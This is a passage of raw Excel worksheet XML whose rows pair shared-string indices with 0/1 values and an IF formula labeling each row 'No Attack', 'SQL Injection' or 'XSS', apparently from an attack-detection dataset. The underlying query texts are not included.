        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25231" s="1" t="s">
        <v>30572</v>
      </c>
      <c r="B25231">
        <v>0</v>
      </c>
      <c r="C25231" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25232" s="1" t="s">
        <v>32482</v>
      </c>
      <c r="B25232">
        <v>0</v>
      </c>
      <c r="C25232" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25233" s="1" t="s">
        <v>28304</v>
      </c>
      <c r="B25233">
        <v>0</v>
      </c>
      <c r="C25233" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25234" s="1" t="s">
        <v>21279</v>
      </c>
      <c r="B25234">
        <v>0</v>
      </c>
      <c r="C25234" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25235" s="1" t="s">
        <v>21341</v>
      </c>
      <c r="B25235">
        <v>0</v>
      </c>
      <c r="C25235" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25236" s="1" t="s">
        <v>30575</v>
      </c>
      <c r="B25236">
        <v>0</v>
      </c>
      <c r="C25236" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25237" s="1" t="s">
        <v>21356</v>
      </c>
      <c r="B25237">
        <v>0</v>
      </c>
      <c r="C25237" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25238" s="1" t="s">
        <v>27594</v>
      </c>
      <c r="B25238">
        <v>0</v>
      </c>
      <c r="C25238" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25239" s="1" t="s">
        <v>29768</v>
      </c>
      <c r="B25239">
        <v>0</v>
      </c>
      <c r="C25239" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25240" s="1" t="s">
        <v>22801</v>
      </c>
      <c r="B25240">
        <v>0</v>
      </c>
      <c r="C25240" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25241" s="1" t="s">
        <v>33015</v>
      </c>
      <c r="B25241">
        <v>0</v>
      </c>
      <c r="C25241" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25242" s="1" t="s">
        <v>10167</v>
      </c>
      <c r="B25242">
        <v>0</v>
      </c>
      <c r="C25242" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25243" s="1" t="s">
        <v>9979</v>
      </c>
      <c r="B25243">
        <v>0</v>
      </c>
      <c r="C25243" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25244" s="1" t="s">
        <v>28105</v>
      </c>
      <c r="B25244">
        <v>0</v>
      </c>
      <c r="C25244" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25245" s="1" t="s">
        <v>30356</v>
      </c>
      <c r="B25245">
        <v>0</v>
      </c>
      <c r="C25245" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25246" s="1" t="s">
        <v>32612</v>
      </c>
      <c r="B25246">
        <v>0</v>
      </c>
      <c r="C25246" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25247" s="1" t="s">
        <v>21072</v>
      </c>
      <c r="B25247">
        <v>0</v>
      </c>
      <c r="C25247" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25248" s="1" t="s">
        <v>23447</v>
      </c>
      <c r="B25248">
        <v>0</v>
      </c>
      <c r="C25248" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25249" s="1" t="s">
        <v>33500</v>
      </c>
      <c r="B25249">
        <v>0</v>
      </c>
      <c r="C25249" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25250" s="1" t="s">
        <v>21954</v>
      </c>
      <c r="B25250">
        <v>0</v>
      </c>
      <c r="C25250" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25251" s="1" t="s">
        <v>36426</v>
      </c>
      <c r="B25251">
        <v>0</v>
      </c>
      <c r="C25251" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25252" s="1" t="s">
        <v>22247</v>
      </c>
      <c r="B25252">
        <v>0</v>
      </c>
      <c r="C25252" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25253" s="1" t="s">
        <v>35373</v>
      </c>
      <c r="B25253">
        <v>0</v>
      </c>
      <c r="C25253" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25254" s="1" t="s">
        <v>21787</v>
      </c>
      <c r="B25254">
        <v>0</v>
      </c>
      <c r="C25254" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25255" s="1" t="s">
        <v>33740</v>
      </c>
      <c r="B25255">
        <v>0</v>
      </c>
      <c r="C25255" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25256" s="1" t="s">
        <v>32488</v>
      </c>
      <c r="B25256">
        <v>0</v>
      </c>
      <c r="C25256" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25257" s="1" t="s">
        <v>21575</v>
      </c>
      <c r="B25257">
        <v>0</v>
      </c>
      <c r="C25257" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25258" s="1" t="s">
        <v>34840</v>
      </c>
      <c r="B25258">
        <v>0</v>
      </c>
      <c r="C25258" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25259" s="1" t="s">
        <v>35500</v>
      </c>
      <c r="B25259">
        <v>0</v>
      </c>
      <c r="C25259" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25260" s="1" t="s">
        <v>33181</v>
      </c>
      <c r="B25260">
        <v>0</v>
      </c>
      <c r="C25260" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25261" s="1" t="s">
        <v>11247</v>
      </c>
      <c r="B25261">
        <v>1</v>
      </c>
      <c r="C25261" s="7" t="str">
        <f t="shared" si="394"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="25262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25262" s="1" t="s">
        <v>10040</v>
      </c>
      <c r="B25262">
        <v>0</v>
      </c>
      <c r="C25262" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25263" s="1" t="s">
        <v>30000</v>
      </c>
      <c r="B25263">
        <v>0</v>
      </c>
      <c r="C25263" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25264" s="1" t="s">
        <v>20866</v>
      </c>
      <c r="B25264">
        <v>0</v>
      </c>
      <c r="C25264" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25265" s="1" t="s">
        <v>30223</v>
      </c>
      <c r="B25265">
        <v>0</v>
      </c>
      <c r="C25265" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25266" s="1" t="s">
        <v>27046</v>
      </c>
      <c r="B25266">
        <v>0</v>
      </c>
      <c r="C25266" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25267" s="1" t="s">
        <v>20848</v>
      </c>
      <c r="B25267">
        <v>0</v>
      </c>
      <c r="C25267" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25268" s="1" t="s">
        <v>34479</v>
      </c>
      <c r="B25268">
        <v>0</v>
      </c>
      <c r="C25268" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25269" s="1" t="s">
        <v>33659</v>
      </c>
      <c r="B25269">
        <v>0</v>
      </c>
      <c r="C25269" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25270" s="1" t="s">
        <v>23972</v>
      </c>
      <c r="B25270">
        <v>0</v>
      </c>
      <c r="C25270" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25271" s="1" t="s">
        <v>27009</v>
      </c>
      <c r="B25271">
        <v>0</v>
      </c>
      <c r="C25271" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25272" s="1" t="s">
        <v>23514</v>
      </c>
      <c r="B25272">
        <v>0</v>
      </c>
      <c r="C25272" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25273" s="1" t="s">
        <v>35890</v>
      </c>
      <c r="B25273">
        <v>0</v>
      </c>
      <c r="C25273" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25274" s="1" t="s">
        <v>35096</v>
      </c>
      <c r="B25274">
        <v>0</v>
      </c>
      <c r="C25274" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25275" s="1" t="s">
        <v>29544</v>
      </c>
      <c r="B25275">
        <v>0</v>
      </c>
      <c r="C25275" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25276" s="1" t="s">
        <v>35175</v>
      </c>
      <c r="B25276">
        <v>0</v>
      </c>
      <c r="C25276" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25277" s="1" t="s">
        <v>32132</v>
      </c>
      <c r="B25277">
        <v>0</v>
      </c>
      <c r="C25277" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25278" s="1" t="s">
        <v>36986</v>
      </c>
      <c r="B25278">
        <v>0</v>
      </c>
      <c r="C25278" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25279" s="1" t="s">
        <v>22688</v>
      </c>
      <c r="B25279">
        <v>0</v>
      </c>
      <c r="C25279" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25280" s="1" t="s">
        <v>30450</v>
      </c>
      <c r="B25280">
        <v>0</v>
      </c>
      <c r="C25280" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25281" s="1" t="s">
        <v>20910</v>
      </c>
      <c r="B25281">
        <v>0</v>
      </c>
      <c r="C25281" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25282" s="1" t="s">
        <v>30657</v>
      </c>
      <c r="B25282">
        <v>0</v>
      </c>
      <c r="C25282" s="7" t="str">
        <f t="shared" si="394"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25283" s="1" t="s">
        <v>34328</v>
      </c>
      <c r="B25283">
        <v>0</v>
      </c>
      <c r="C25283" s="7" t="str">
        <f t="shared" ref="C25283:C25346" si="395">IF(B25283=0,"No Attack", IF(B25283=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25284" s="1" t="s">
        <v>35242</v>
      </c>
      <c r="B25284">
        <v>0</v>
      </c>
      <c r="C25284" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25285" s="1" t="s">
        <v>34798</v>
      </c>
      <c r="B25285">
        <v>0</v>
      </c>
      <c r="C25285" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25286" s="1" t="s">
        <v>32068</v>
      </c>
      <c r="B25286">
        <v>0</v>
      </c>
      <c r="C25286" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25287" s="1" t="s">
        <v>35030</v>
      </c>
      <c r="B25287">
        <v>0</v>
      </c>
      <c r="C25287" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25288" s="1" t="s">
        <v>22831</v>
      </c>
      <c r="B25288">
        <v>0</v>
      </c>
      <c r="C25288" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25289" s="1" t="s">
        <v>21612</v>
      </c>
      <c r="B25289">
        <v>0</v>
      </c>
      <c r="C25289" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25290" s="1" t="s">
        <v>35638</v>
      </c>
      <c r="B25290">
        <v>0</v>
      </c>
      <c r="C25290" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25291" s="1" t="s">
        <v>27498</v>
      </c>
      <c r="B25291">
        <v>0</v>
      </c>
      <c r="C25291" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25292" s="1" t="s">
        <v>35871</v>
      </c>
      <c r="B25292">
        <v>0</v>
      </c>
      <c r="C25292" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25293" s="1" t="s">
        <v>28855</v>
      </c>
      <c r="B25293">
        <v>0</v>
      </c>
      <c r="C25293" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25294" s="1" t="s">
        <v>34968</v>
      </c>
      <c r="B25294">
        <v>0</v>
      </c>
      <c r="C25294" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25295" s="1" t="s">
        <v>23837</v>
      </c>
      <c r="B25295">
        <v>0</v>
      </c>
      <c r="C25295" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25296" s="1" t="s">
        <v>31106</v>
      </c>
      <c r="B25296">
        <v>0</v>
      </c>
      <c r="C25296" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25297" s="1" t="s">
        <v>21626</v>
      </c>
      <c r="B25297">
        <v>0</v>
      </c>
      <c r="C25297" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25298" s="1" t="s">
        <v>28545</v>
      </c>
      <c r="B25298">
        <v>0</v>
      </c>
      <c r="C25298" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25299" s="1" t="s">
        <v>28459</v>
      </c>
      <c r="B25299">
        <v>0</v>
      </c>
      <c r="C25299" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25300" s="1" t="s">
        <v>35504</v>
      </c>
      <c r="B25300">
        <v>0</v>
      </c>
      <c r="C25300" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25301" s="1" t="s">
        <v>35252</v>
      </c>
      <c r="B25301">
        <v>0</v>
      </c>
      <c r="C25301" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25302" s="1" t="s">
        <v>31735</v>
      </c>
      <c r="B25302">
        <v>0</v>
      </c>
      <c r="C25302" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25303" s="1" t="s">
        <v>10056</v>
      </c>
      <c r="B25303">
        <v>0</v>
      </c>
      <c r="C25303" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25304" s="1" t="s">
        <v>10089</v>
      </c>
      <c r="B25304">
        <v>0</v>
      </c>
      <c r="C25304" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25305" s="1" t="s">
        <v>10015</v>
      </c>
      <c r="B25305">
        <v>0</v>
      </c>
      <c r="C25305" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25306" s="1" t="s">
        <v>10135</v>
      </c>
      <c r="B25306">
        <v>0</v>
      </c>
      <c r="C25306" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25307" s="1" t="s">
        <v>10050</v>
      </c>
      <c r="B25307">
        <v>0</v>
      </c>
      <c r="C25307" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25308" s="1" t="s">
        <v>23211</v>
      </c>
      <c r="B25308">
        <v>0</v>
      </c>
      <c r="C25308" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25309" s="1" t="s">
        <v>23502</v>
      </c>
      <c r="B25309">
        <v>0</v>
      </c>
      <c r="C25309" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25310" s="1" t="s">
        <v>33138</v>
      </c>
      <c r="B25310">
        <v>0</v>
      </c>
      <c r="C25310" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25311" s="1" t="s">
        <v>34487</v>
      </c>
      <c r="B25311">
        <v>0</v>
      </c>
      <c r="C25311" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25312" s="1" t="s">
        <v>21644</v>
      </c>
      <c r="B25312">
        <v>0</v>
      </c>
      <c r="C25312" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25313" s="1" t="s">
        <v>21047</v>
      </c>
      <c r="B25313">
        <v>0</v>
      </c>
      <c r="C25313" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25314" s="1" t="s">
        <v>21345</v>
      </c>
      <c r="B25314">
        <v>0</v>
      </c>
      <c r="C25314" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25315" s="1" t="s">
        <v>28048</v>
      </c>
      <c r="B25315">
        <v>0</v>
      </c>
      <c r="C25315" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25316" s="1" t="s">
        <v>28528</v>
      </c>
      <c r="B25316">
        <v>0</v>
      </c>
      <c r="C25316" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25317" s="1" t="s">
        <v>21441</v>
      </c>
      <c r="B25317">
        <v>0</v>
      </c>
      <c r="C25317" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25318" s="1" t="s">
        <v>34459</v>
      </c>
      <c r="B25318">
        <v>0</v>
      </c>
      <c r="C25318" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25319" s="1" t="s">
        <v>30671</v>
      </c>
      <c r="B25319">
        <v>0</v>
      </c>
      <c r="C25319" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25320" s="1" t="s">
        <v>21642</v>
      </c>
      <c r="B25320">
        <v>0</v>
      </c>
      <c r="C25320" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25321" s="1" t="s">
        <v>28227</v>
      </c>
      <c r="B25321">
        <v>0</v>
      </c>
      <c r="C25321" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25322" s="1" t="s">
        <v>30361</v>
      </c>
      <c r="B25322">
        <v>0</v>
      </c>
      <c r="C25322" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25323" s="1" t="s">
        <v>22733</v>
      </c>
      <c r="B25323">
        <v>0</v>
      </c>
      <c r="C25323" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25324" s="1" t="s">
        <v>32234</v>
      </c>
      <c r="B25324">
        <v>0</v>
      </c>
      <c r="C25324" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25325" s="1" t="s">
        <v>34754</v>
      </c>
      <c r="B25325">
        <v>0</v>
      </c>
      <c r="C25325" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25326" s="1" t="s">
        <v>30126</v>
      </c>
      <c r="B25326">
        <v>0</v>
      </c>
      <c r="C25326" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25327" s="1" t="s">
        <v>21382</v>
      </c>
      <c r="B25327">
        <v>0</v>
      </c>
      <c r="C25327" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25328" s="1" t="s">
        <v>27635</v>
      </c>
      <c r="B25328">
        <v>0</v>
      </c>
      <c r="C25328" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25329" s="1" t="s">
        <v>35073</v>
      </c>
      <c r="B25329">
        <v>0</v>
      </c>
      <c r="C25329" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25330" s="1" t="s">
        <v>32314</v>
      </c>
      <c r="B25330">
        <v>0</v>
      </c>
      <c r="C25330" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25331" s="1" t="s">
        <v>28400</v>
      </c>
      <c r="B25331">
        <v>0</v>
      </c>
      <c r="C25331" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25332" s="1" t="s">
        <v>34113</v>
      </c>
      <c r="B25332">
        <v>0</v>
      </c>
      <c r="C25332" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25333" s="1" t="s">
        <v>27358</v>
      </c>
      <c r="B25333">
        <v>0</v>
      </c>
      <c r="C25333" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25334" s="1" t="s">
        <v>30067</v>
      </c>
      <c r="B25334">
        <v>0</v>
      </c>
      <c r="C25334" s="7" t="str">
        <f t="shared" si="395"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="25335" spans="1:3" x14ac:dyDescent="0.3">
